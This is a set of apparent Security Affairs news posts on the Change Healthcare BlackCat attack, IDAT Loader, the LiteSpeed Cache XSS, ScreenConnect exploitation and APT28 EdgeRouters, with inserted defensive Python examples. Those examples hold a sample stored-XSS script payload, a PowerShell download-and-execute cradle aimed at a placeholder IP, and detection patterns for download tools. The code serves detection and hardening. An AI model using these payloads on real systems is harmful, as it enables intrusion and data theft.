Security Affairs

US pharmacy outage caused by Blackcat ransomware attack on Optum Solutions

27 February 2024 at 10:32

A BlackCat ransomware attack hit UnitedHealth Group subsidiary Optum causing an outage impacting the Change Healthcare payment exchange platform.

A ransomware attack hit the UnitedHealth Group subsidiary Optum leading to an outage impacting the Change Healthcare payment exchange platform.

Optum Solutions is a subsidiary of UnitedHealth Group, a leading health insurance company in the United States. Optum Solutions operates the Change Healthcare platform, which serves as a critical payment exchange platform for the US healthcare system.

“On February 21, 2024, UnitedHealth Group (the “Company”) identified a suspected nation-state associated cyber security threat actor had gained access to some of the Change Healthcare information technology systems. Immediately upon detection of this outside threat, the Company proactively isolated the impacted systems from other connecting systems in the interest of protecting our partners and patients, to contain, assess and remediate the incident.” reads the SEC filing. “The Company is working diligently to restore those systems and resume normal operations as soon as possible, but cannot estimate the duration or extent of the disruption at this time. The Company has retained leading security experts, is working with law enforcement and notified customers, clients and certain government agencies.”

Reuters, citing sources familiar with the investigation, linked the attack to the BlackCat ransomware group, whereas UnitedHealth Group’s SEC filing attributed it to a suspected nation-state actor.

“Hackers working for the ‘Blackcat’ ransomware gang are behind the outage at UnitedHealth’s technology unit that has snarled prescription deliveries for six days, two people familiar with the matter told Reuters on Monday.” reads the Reuters report. “The problems began last week after hackers gained access to Change Healthcare’s information technology systems and have led to disruptions at pharmacies across the United States.”

In response to the attack, the company was forced to shut down its systems causing an outage impacting multiple services of U.S. healthcare organizations.

In its latest update, Change Healthcare confirmed that it is experiencing a cybersecurity issue and is working to address it. To contain the threat, the company disconnected Change Healthcare’s systems itself, so that customers and partners would not have to disconnect on their side. The company believes that the Optum, UnitedHealthcare and UnitedHealth Group systems have not been affected. It is investigating the incident with the help of the cybersecurity firm Mandiant.

“We are working on multiple approaches to restore the impacted environment and will not take any shortcuts or take any additional risk as we bring our systems back online.” reads the update published by Change Healthcare. “We will continue to be proactive and aggressive with all our systems and if we suspect any issue with the system, we will immediately take action and disconnect. The disruption is expected to last at least through the day. We will provide updates as more information becomes available.”

The BlackCat/ALPHV ransomware gang has been active since November 2021, and its long list of victims includes the industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, the gas pipeline operator Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. The group’s ransom demands range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the group’s primary domain went offline and its administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site had been taken down by a law enforcement operation. The group denied this, but on December 19 the domain displayed the seizure notice.

The seizure is the result of a joint operation conducted by law enforcement agencies from the US, Denmark, Germany, the UK, the Netherlands, Australia, Spain, and Austria, together with Europol.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation and amassed hundreds of millions of dollars in ransom payments.

In February 2024, the U.S. Department of State announced a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation, and a further reward of up to $5 million for information leading to the arrest and/or conviction, in any country, of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

The second reward targets the affiliates and initial access brokers that facilitated the group’s attacks.

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Optum Solutions)

IDAT Loader used to infect a Ukraine entity in Finland with Remcos RAT

27 February 2024 at 14:56

A new malware campaign is targeting a Ukraine entity in Finland with Remcos RAT distributed via a loader called IDAT Loader.

Morphisec Threat Labs researchers observed a new malware campaign targeting a Ukraine entity in Finland with Remcos RAT distributed via a loader called IDAT Loader.

The Computer Emergency Response Team of Ukraine (CERT-UA) linked the attacks to a threat actor tracked as UAC-0184.

The attackers employed steganography to hide the malicious payload inside an image, evading signature-based detection.

Remcos is a commercial remote access trojan (RAT) that can allow operators to take over the infected systems. 

Researchers from the cybersecurity firm Uptycs observed a Remcos RAT campaign using phishing emails claiming to be from an Israel Defense Forces consultant.

IDAT stands out as a sophisticated loader that can be used to deploy multiple malware families, including Danabot, SystemBC, and RedLine Stealer. The modular architecture of the IDAT loader allows it to easily add new features. The loader already supports code injection and execution modules, distinguishing it from conventional loaders.

The malware implements multiple evasion techniques, including dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and syscalls. The IDAT loader relies on a multi-stage infection chain.

“The initial stage downloads or loads the second stage, housing a module table and the primary instrumentation shellcode. The second stage injects this shellcode into a legitimate DLL or a new process. Subsequently, the main instrumentation shellcode decrypts and executes the final payload, adapting its injection or execution based on file type and configuration flags.” reads the analysis published by Morphisec. “Interestingly, in this case the IDAT modules were embedded within the primary executable, which is commonly downloaded from a remote server.” 

The IDAT Loader sample analyzed by the researchers borrows code from the loader family dubbed Hijack Loader.
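The steganography mentioned above, where the payload rides inside an image, is the part of the chain a defender can check for without executing anything. The following Python is an added example, not Morphisec’s or CERT-UA’s tooling and not a description of IDAT Loader’s exact encoding: it walks a PNG’s chunks and flags the three generic places a payload can be parked (bytes appended after IEND, IDAT bytes left over after the zlib stream ends, and compressed data beyond what the IHDR dimensions account for). The images and the payload bytes are constructed inline.

```python
"""Added example: flag a payload parked inside or after a PNG's image data.
Not Morphisec's or CERT-UA's tooling; the sample images and payload are
constructed below.  Three generic hiding places are checked: bytes appended
after IEND, IDAT bytes left over after the zlib stream ends, and compressed
data beyond what the IHDR dimensions account for."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # PNG colour type -> samples per pixel


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, as the PNG spec lays out."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width: int, height: int, rgb=(0, 0, 0), extra_raw: bytes = b"") -> bytes:
    """Minimal 8-bit RGB PNG; extra_raw is smuggled inside the zlib stream."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    rows = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))  # filter byte 0 per row
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(rows + extra_raw)) + png_chunk(b"IEND", b""))


def inspect_png(data: bytes) -> dict:
    """Walk the chunks, verify CRCs, and compare the IDAT stream with IHDR."""
    if not data.startswith(PNG_SIG):
        return {"chunks": [], "findings": ["not-a-png"]}
    chunks, findings, idat, expected_raw = [], [], b"", None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            findings.append("truncated-chunk")
            break
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        name = ctype.decode("latin-1")
        chunks.append(name)
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            findings.append(f"bad-crc:{name}")
        if ctype == b"IHDR" and len(body) >= 13:
            width, height, depth, colour = struct.unpack(">IIBB", body[:10])
            if depth == 8 and colour in CHANNELS:
                expected_raw = height * (1 + width * CHANNELS[colour])
        elif ctype == b"IDAT":
            idat += body  # all IDAT chunks together form one zlib stream
        pos += 12 + length
        if ctype == b"IEND":
            break
    if data[pos:]:
        findings.append(f"trailing-data-after-IEND:{len(data) - pos}")
    d = zlib.decompressobj()
    try:
        pixels = d.decompress(idat) + d.flush()
    except zlib.error:
        findings.append("idat-not-zlib")
    else:
        if d.unused_data:
            findings.append(f"idat-bytes-after-zlib-stream:{len(d.unused_data)}")
        if expected_raw is not None and len(pixels) != expected_raw:
            findings.append(f"idat-size-mismatch:{len(pixels)}!={expected_raw}")
    return {"chunks": chunks, "findings": findings}


# Constructed samples: a clean 2x2 image and three ways of hiding a fake PE stub in it.
PAYLOAD = b"MZ\x90\x00" + b"\x41" * 32
CLEAN = make_png(2, 2, (255, 0, 0))
APPENDED = CLEAN + PAYLOAD
EXTRA_IDAT = CLEAN.replace(png_chunk(b"IEND", b""), png_chunk(b"IDAT", PAYLOAD) + png_chunk(b"IEND", b""))
IN_STREAM = make_png(2, 2, (255, 0, 0), extra_raw=PAYLOAD)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("appended", APPENDED),
                       ("extra-idat", EXTRA_IDAT), ("in-stream", IN_STREAM)):
        print(label, inspect_png(img)["findings"])
```

The size check only fires for 8-bit images without interlacing, which is where the arithmetic is exact; for other depths it is skipped rather than guessed. None of these checks decodes or runs the payload, so they are safe to run on samples straight from a sandbox.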

IDAT Loader

The researchers noticed that threat actors behind IDAT Loader used a distinctive array of Tactics, Techniques, and Procedures (TTPs) to avoid explicit connections to prior campaigns.   

The researchers shared Indicators of Compromise (IOCs) for this threat; a more extensive list of IOCs is available in the CERT-UA bulletin.


Pierluigi Paganini

(SecurityAffairs – hacking, cyberattack)

XSS flaw in LiteSpeed Cache plugin exposes millions of WordPress sites at risk

27 February 2024 at 15:29

Researchers warn of an XSS vulnerability, tracked as CVE-2023-40000, in the LiteSpeed Cache plugin for WordPress.

Patchstack researchers warn of an unauthenticated site-wide stored XSS vulnerability, tracked as CVE-2023-40000, that impacts the LiteSpeed Cache plugin for WordPress.

LiteSpeed Cache (free version) is a popular WordPress caching plugin with over 4 million active installations.

An unauthenticated user can exploit the vulnerability to steal sensitive information or escalate privileges on the WordPress site by performing a single HTTP request.

“This plugin suffers from unauthenticated site-wide stored XSS vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.” read the advisory published by Patchstack.

“This vulnerability occurs because the code that handles input from the user doesn’t implement sanitization and output escaping. This case also combined with improper access control on one of the available REST API endpoints from the plugin. The described vulnerability was fixed in version 5.7.0.1 and assigned CVE-2023-40000.”

The vulnerability resides in the function ‘update_cdn_status.’ 

Because the vulnerability stems from building an HTML value directly from a POST body parameter used as the admin notice message, the issue can be fixed by escaping that parameter with esc_html before it is rendered. In addition, the vendor added a permission check on the update_cdn_status function, including hash validation, so that only privileged users can reach it.

The vulnerability was solved with the release of version 5.7.0.1 in October 2023.

“We recommend applying escaping and sanitization to any message that will be displayed as an admin notice. Depending on the context of the data, we recommend using sanitize_text_field to sanitize value for HTML output (outside of HTML attribute) or esc_html. For escaping values inside of attributes, you can use the esc_attr function. We also recommend applying a proper permission or authorization check to the registered rest route endpoints.” concludes the post.
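To make the two root causes concrete, the following Python model, an added example rather than the plugin’s or Patchstack’s code, mirrors the flow in a stand-alone form: an endpoint that stores a caller-supplied admin-notice message without a permission check, and an admin page that echoes it unescaped, next to the hardened version with a capability check, a constant-time hash comparison and escaping at output (the WordPress equivalents are register_rest_route’s permission_callback, sanitize_text_field and esc_html). Option, capability and secret names are assumptions.

```python
"""Added example: Python model of the two defects behind CVE-2023-40000 as
Patchstack describes them (an admin-notice REST endpoint with no permission
check, and an admin page that echoes the stored value unescaped), beside the
hardened flow.  This is a stand-in for the WordPress PHP flow, not the
plugin's code; option, capability and secret names are assumptions."""
import hashlib
import hmac
import html
import re
from dataclasses import dataclass, field


@dataclass
class Site:
    options: dict = field(default_factory=dict)      # stands in for wp_options
    secret: bytes = b"constructed-per-site-secret"   # seed for the endpoint hash


@dataclass
class Request:
    params: dict                       # POST body
    caps: frozenset = frozenset()      # caller's capabilities; empty = unauthenticated
    hash: str = ""                     # value the hardened endpoint requires


# --- vulnerable flow -------------------------------------------------------
def vuln_update_cdn_status(site: Site, req: Request) -> int:
    """No permission check; the value is stored verbatim."""
    site.options["cdn_notice"] = req.params.get("msg", "")
    return 200


def vuln_admin_notice(site: Site) -> str:
    """Admin notice built by concatenation: the stored value lands unescaped
    in the page of every administrator who opens wp-admin (stored XSS)."""
    return f'<div class="notice notice-error"><p>{site.options.get("cdn_notice", "")}</p></div>'


# --- hardened flow ---------------------------------------------------------
_TAG_RE = re.compile(r"<[^>]*>")
_CTRL_RE = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_text_field(value: str) -> str:
    """Approximation of WordPress sanitize_text_field(): strip tags,
    control characters and surrounding whitespace before storage."""
    return _CTRL_RE.sub("", _TAG_RE.sub("", value)).strip()


def esc_html(value: str) -> str:
    """Approximation of WordPress esc_html(): entity-encode for an HTML text node."""
    return html.escape(value, quote=True)


def endpoint_hash(site: Site) -> str:
    """Per-site secret bound to this action; compared in constant time below."""
    return hmac.new(site.secret, b"update_cdn_status", hashlib.sha256).hexdigest()


def safe_update_cdn_status(site: Site, req: Request) -> int:
    if "manage_options" not in req.caps:                 # permission_callback
        return 401
    if not hmac.compare_digest(req.hash, endpoint_hash(site)):
        return 403
    site.options["cdn_notice"] = sanitize_text_field(req.params.get("msg", ""))
    return 200


def safe_admin_notice(site: Site) -> str:
    """Escape at output as well: storage-time sanitization is not a substitute."""
    return f'<div class="notice notice-error"><p>{esc_html(site.options.get("cdn_notice", ""))}</p></div>'


# Constructed payload: a script that would run in an administrator's browser.
PAYLOAD = "<script>fetch('/wp-json/wp/v2/users',{credentials:'include'})</script>"


def demo() -> tuple[int, str, int, int, str]:
    """Run both flows with an unauthenticated request carrying PAYLOAD."""
    vuln = Site()
    anon = Request(params={"msg": PAYLOAD})
    v_status = vuln_update_cdn_status(vuln, anon)
    v_page = vuln_admin_notice(vuln)

    safe = Site()
    s_anon = safe_update_cdn_status(safe, anon)
    admin = Request(params={"msg": PAYLOAD}, caps=frozenset({"manage_options"}),
                    hash=endpoint_hash(safe))
    s_admin = safe_update_cdn_status(safe, admin)
    return v_status, v_page, s_anon, s_admin, safe_admin_notice(safe)


if __name__ == "__main__":
    print(demo())
```

The two layers are independent on purpose: the capability and hash checks stop the unauthenticated write, and the output escaping stops a script from running even if a privileged user is tricked into submitting one. Values placed inside an HTML attribute would need attribute escaping (esc_attr in WordPress) rather than the text-node form shown here.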


Pierluigi Paganini

(SecurityAffairs – hacking, LiteSpeed Cache plugin)

Black Basta and Bl00dy ransomware gangs exploit recent ConnectWise ScreenConnect bugs

27 February 2024 at 21:03

New threat actors have started exploiting ConnectWise ScreenConnect vulnerabilities, including the Black Basta and Bl00dy ransomware gangs.

Multiple threat actors have started exploiting the recently disclosed vulnerabilities, tracked as CVE-2024-1709 (CVSS score of 10) and CVE-2024-1708 (CVSS score of 8.4), in the ConnectWise ScreenConnect software.

ConnectWise recently warned of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:

  • CVE-2024-1709 – CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
  • CVE-2024-1708 – CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”)  (CVSS score 8.4)

Both vulnerabilities were reported on February 13, 2024, through the company’s vulnerability disclosure channel via the ConnectWise Trust Center. At the time of the initial advisory, the company was not aware of in-the-wild exploitation, but given the high likelihood of the flaws being targeted, ConnectWise recommended installing the updates as emergency changes within days.

The issues affect ScreenConnect 23.9.7 and prior; the remediation steps are listed in the vendor advisory.

Two days after the vendor addressed the two vulnerabilities, it also updated its advisory to confirm the ongoing exploitation of both issues.

Trend Micro researchers observed multiple threat actor groups that are exploiting vulnerabilities in ConnectWise ScreenConnect for different purposes, including ransomware deployment, and data exfiltration attacks.

Trend Micro confirmed that Black Basta and Bl00dy ransomware groups are actively exploiting both flaws and shared details about their attack chains.

Black Basta operators exploit the flaws to gain an initial foothold on the vulnerable server, then perform reconnaissance, discovery, and privilege escalation.

The gang was observed deploying the popular post-exploitation tool Cobalt Strike.

The attackers were observed searching for members of the ‘domain admin’ group to identify potential high-value targets for further attacks. Then the attackers also added new accounts to the local administrators group and deployed scripts to identify machines that connected to the Active Directory environment within the past 90 days. The attackers attempt to target these machines in further attacks or use them for lateral movement within the target network.

The Bl00dy ransomware group was also observed exploiting the two flaws in campaigns to deploy leaked builders from Conti and LockBit. The ransom notes deployed in the attacks allowed the researchers to link the attacks to the Bl00dy group.

The researchers also observed attacks in which threat actors exploited the ScreenConnect vulnerabilities to deploy the XWorm malware. XWorm is a versatile malware that not only grants remote access, but also allows attackers to propagate through networks, exfiltrate sensitive data, and download additional payloads.

“After establishing a presence on the susceptible ConnectWise server, we observed threat actors trying to execute PowerShell commands to download and run the XWORM malware.” reads the Trend Micro report.

Trend Micro also spotted threat actors deploying other remote access software, such as Atera and Syncro.
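The behaviours Trend Micro lists translate directly into detection logic on ScreenConnect hosts. The following Python is an added example (not Trend Micro’s or ConnectWise’s code) that runs such checks over constructed Windows Security events: shells spawned by the ScreenConnect service, download cradles in the command line, domain-admin enumeration, account creation (event 4720) and additions to the local Administrators group (event 4732). The ScreenConnect process names and the event field names are assumptions to be mapped to your own telemetry.

```python
"""Added example: detection logic for the post-exploitation steps Trend Micro
describes on ScreenConnect hosts, run over constructed Windows Security
events (4688 process creation, 4720 user created, 4732 member added to a
local group).  Process names and field names are assumptions; map them to
your own telemetry (Sysmon event 1 carries the same fields as 4688)."""
import ntpath
import re

# Assumed ScreenConnect binaries that act as the parent of attacker commands.
SC_PARENTS = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
              "screenconnect.service.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|certutil.*urlcache",
    re.IGNORECASE)
DOMAIN_ADMIN_RE = re.compile(r'net\s+group\s+"?domain admins"?|get-adgroupmember.*domain admins',
                             re.IGNORECASE)
LOCAL_ADMINS = {"administrators", "s-1-5-32-544"}  # name or well-known SID of the local group


def detect(events: list[dict]) -> list[dict]:
    """Return one alert dict per matched behaviour, in event order."""
    alerts = []
    for ev in events:
        host, eid = ev.get("host", "?"), ev.get("event_id")
        if eid == 4688:
            parent = ntpath.basename(ev.get("parent_image", "")).lower()
            child = ntpath.basename(ev.get("image", "")).lower()
            cmd = ev.get("command_line", "")
            if parent in SC_PARENTS and child in SHELLS:
                alerts.append({"kind": "sc-shell", "host": host, "detail": f"{parent} -> {child}"})
                if CRADLE_RE.search(cmd):
                    alerts.append({"kind": "download-cradle", "host": host, "detail": cmd})
            if DOMAIN_ADMIN_RE.search(cmd):
                alerts.append({"kind": "domain-admin-discovery", "host": host, "detail": cmd})
        elif eid == 4720:
            alerts.append({"kind": "account-created", "host": host, "detail": ev.get("target_user", "")})
        elif eid == 4732 and ev.get("group", "").lower() in LOCAL_ADMINS:
            alerts.append({"kind": "local-admin-added", "host": host, "detail": ev.get("member", "")})
    return alerts


SC_SVC = r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events; 198.51.100.7 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "SRV-SC01", "parent_image": SC_SVC, "image": PS,
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://198.51.100.7/x.ps1')\""},
    {"event_id": 4688, "host": "SRV-SC01", "parent_image": SC_SVC,
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c net group "domain admins" /domain'},
    {"event_id": 4688, "host": "WS-042", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell -File C:\scripts\backup.ps1"},   # benign admin activity
    {"event_id": 4720, "host": "SRV-SC01", "target_user": "svc_update"},
    {"event_id": 4732, "host": "SRV-SC01", "group": "Administrators", "member": r"SRV-SC01\svc_update"},
    {"event_id": 4732, "host": "SRV-SC01", "group": "Remote Desktop Users", "member": r"CORP\jdoe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Account creation and local-group changes are noisy on their own; the value is in correlating them on the same host, within minutes of a shell spawned by the ScreenConnect process, which is the sequence Trend Micro describes. Command-line logging (or Sysmon) has to be enabled for 4688 to carry the command line at all.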

“Following our detailed examination of various threat actors exploiting vulnerabilities in ConnectWise ScreenConnect, we emphasize the urgency of updating to the latest version of the software.” Trend Micro concludes. “Immediate patching is not just advisable; it is a critical security requirement to protect your systems from these identified threats.”


Pierluigi Paganini

(SecurityAffairs – hacking, ConnectWise ScreenConnect)

Russia-linked APT28 compromised Ubiquiti EdgeRouters to facilitate cyber operations

28 February 2024 at 11:43

Russian cyberspies are compromising Ubiquiti EdgeRouters to evade detection, warns a joint advisory published by authorities.

The Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners released a joint Cybersecurity Advisory (CSA) to warn that Russia-linked threat actors are using compromised Ubiquiti EdgeRouters (EdgeRouters) to evade detection in cyber operations worldwide.

The US agencies and their international partners (from Belgium, Brazil, France, Germany, Latvia, Lithuania, Norway, Poland, South Korea, and the United Kingdom) observed the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS), also known as APT28, Fancy Bear, and Forest Blizzard (Strontium), using a botnet of compromised EdgeRouter devices, named Moobot, to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools worldwide.

“As early as 2022, APT28 actors had utilized compromised EdgeRouters to facilitate covert cyber operations against governments, militaries, and organizations around the world.” reads the joint report. “These operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation. Targeted countries include Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US[1][2]. Additionally, the actors have strategically targeted many individuals in Ukraine.”

In February 2024, the U.S. Department of Justice announced that a January 2024 court-authorized operation had neutralized the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The Russian state-sponsored hackers used the botnet to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type have been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti EdgeOS routers; it was initially created by a known cybercriminal group and later taken over by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Networks Unit 42 researchers in February 2021. In November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the web server of several Hikvision products, and since September 2022 it has been spotted targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware itself to copy and delete stolen and malicious data and files from the compromised routers. The operation also locked the Russian cyberspies out of the routers by reversibly modifying the routers’ firewall rules to block remote management access.

Researchers observed the Moobot botnet targeting routers with default or weak credentials to deploy OpenSSH trojans: the attackers replaced the OpenSSH server binaries on compromised EdgeRouters with trojanized versions that allow remote attackers to bypass authentication.

APT28 group deployed Python scripts on compromised EdgeRouters to collect and validate stolen webmail account credentials. The webmail account credentials were collected via cross-site scripting and browser-in-the-browser spear-phishing campaigns.

APT28 was also observed exploiting the critical privilege escalation vulnerability CVE-2023-23397 (CVSS score: 9.8) in Microsoft Outlook, which could allow an attacker to steal NT LAN Manager (NTLM) hashes and mount a relay attack without requiring any user interaction.

“Additionally, an FBI investigation revealed that as early as 2022, APT28 actors had exploited CVE-2023-23397, a zero-day vulnerability at the time, to collect NTLMv2 digests from targeted Outlook accounts [T1203]. Per a Microsoft blog post[3] published in March 2023, CVE-2023-23397 is a critical elevation of privilege vulnerability in Microsoft Outlook on Windows wherein Net-NTLMv2 hashes are leaked to actor-controlled infrastructure [T1119, T1020].” continues the report.

In December 2023, the Russia-linked APT28 developed a compact Python backdoor dubbed MASEPIE that allows operators to execute arbitrary commands on compromised machines. APT28 used compromised Ubiquiti EdgeRouters as command-and-control infrastructure for MASEPIE backdoors; communication to and from the EdgeRouters was encrypted with a randomly generated 16-character AES key. Notably, APT28 does not install MASEPIE on the EdgeRouters themselves, but on systems belonging to the targeted individuals and organizations.

“In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns.” concludes the report.

Below are some of the mitigations provided by the report; the government experts pointed out that rebooting a compromised EdgeRouter will not remove the malware:

  • Perform a hardware factory reset to flush file systems of malicious files.
  • Upgrade to the latest firmware version.
  • Change any default usernames and passwords.
  • Implement strategic firewall rules on WAN-side interfaces to prevent the unwanted exposure of remote management services.
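The last two mitigations can be checked from a configuration export. The following Python is an added example, not from the advisory or Ubiquiti: it parses EdgeOS’s Vyatta-derived config.boot syntax and reports a default ubnt account, WAN-side interfaces with no local firewall ruleset in front of the ssh/gui management services, and rulesets whose default action is not drop. The weak and hardened configurations are constructed, and identifying an interface as WAN by its description or a DHCP address is a heuristic.

```python
"""Added example: audit an EdgeOS configuration export (config.boot or
'show configuration' output) against the advisory's mitigations.  Not from
the advisory or Ubiquiti.  The nested-brace format is EdgeOS's Vyatta-derived
syntax; both configurations below are constructed; treating an interface as
WAN because its description says so or it uses DHCP is a heuristic."""


def parse_edgeos(text: str) -> dict:
    """Turn 'key value' leaves and 'name {' ... '}' blocks into nested dicts."""
    root: dict = {}
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("/*"):
            continue
        if line == "}":
            stack.pop()
        elif line.endswith("{"):
            node: dict = {}
            stack[-1][line[:-1].strip()] = node
            stack.append(node)
        else:
            key, _, value = line.partition(" ")
            stack[-1][key] = value.strip().strip('"')
    return root


def audit(cfg: dict) -> list[str]:
    """Report findings that map to the advisory's credential and WAN-exposure mitigations."""
    findings = []
    login = cfg.get("system", {}).get("login", {})
    if "user ubnt" in login:
        findings.append("system login: default account 'ubnt' still exists")
    services = [s for s in ("ssh", "gui") if s in cfg.get("service", {})]
    rulesets = cfg.get("firewall", {})
    for key, iface in cfg.get("interfaces", {}).items():
        if not key.startswith("ethernet "):
            continue
        name = key.split()[1]
        is_wan = "wan" in iface.get("description", "").lower() or iface.get("address") == "dhcp"
        if not is_wan:
            continue
        local = iface.get("firewall", {}).get("local", {}).get("name")
        if local is None:
            findings.append(f"{name}: WAN interface has no 'firewall local' ruleset; "
                            f"{', '.join(services) or 'no'} management services reachable from the internet")
            continue
        ruleset = rulesets.get(f"name {local}", {})
        if ruleset.get("default-action") != "drop":
            findings.append(f"{name}: ruleset {local} default-action is "
                            f"{ruleset.get('default-action', 'unset')}, not drop")
    return findings


RULESET = """
firewall {
    name WAN_LOCAL {
        default-action drop
        rule 10 {
            action accept
            state {
                established enable
                related enable
            }
        }
    }
}
service {
    gui {
        https-port 443
    }
    ssh {
        port 22
    }
}
"""

# Constructed: ruleset defined but never applied to eth0, default user still present.
WEAK_CONFIG = RULESET + """
interfaces {
    ethernet eth0 {
        address dhcp
        description "WAN"
    }
    ethernet eth1 {
        address 192.168.1.1/24
        description "LAN"
    }
}
system {
    login {
        user ubnt {
            authentication {
                encrypted-password $6$constructed
            }
            level admin
        }
    }
}
"""

# Constructed: same router after applying the mitigations.
HARDENED_CONFIG = RULESET + """
interfaces {
    ethernet eth0 {
        address dhcp
        description "WAN"
        firewall {
            local {
                name WAN_LOCAL
            }
        }
    }
    ethernet eth1 {
        address 192.168.1.1/24
        description "LAN"
    }
}
system {
    login {
        user netadmin {
            authentication {
                encrypted-password $6$constructed
            }
            level admin
        }
    }
}
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(parse_edgeos(text)))
```

A clean audit does not prove the device is clean: the advisory’s point is that a compromised EdgeRouter carries a trojanized sshd, so the factory reset and firmware upgrade come first and this check belongs to the rebuild, not to the triage.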


Pierluigi Paganini

(SecurityAffairs – hacking, Ubiquiti EdgeRouters)

FBI, CISA, HHS warn of targeted ALPHV/Blackcat ransomware attacks against the healthcare sector

28 February 2024 at 14:03

The FBI, CISA, and the Department of HHS warned U.S. healthcare organizations of targeted ALPHV/Blackcat ransomware attacks.

A cybersecurity alert published by the FBI, CISA, and the Department of Health and Human Services (HHS) warned U.S. healthcare organizations of targeted attacks by ALPHV/Blackcat ransomware affiliates.

The US agencies released a report containing IOCs and TTPs associated with the ALPHV Blackcat RaaS operation identified through law enforcement investigations conducted as recently as February 2024.

The advisory updates the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released on April 19, 2022 and December 19, 2023.

This alert aims at organizations in the healthcare sector because ALPHV Blackcat affiliates have been observed primarily targeting this sector.

“From mid-December 2023 onward, the healthcare sector has emerged as the most frequently targeted among the approximately 70 disclosed victims.” reads the joint advisory. “This trend is believed to be a response to the encouragement from ALPHV Blackcat administrators, who urged affiliates to focus their efforts on hospitals following operational actions against the group and its infrastructure in early December 2023.”

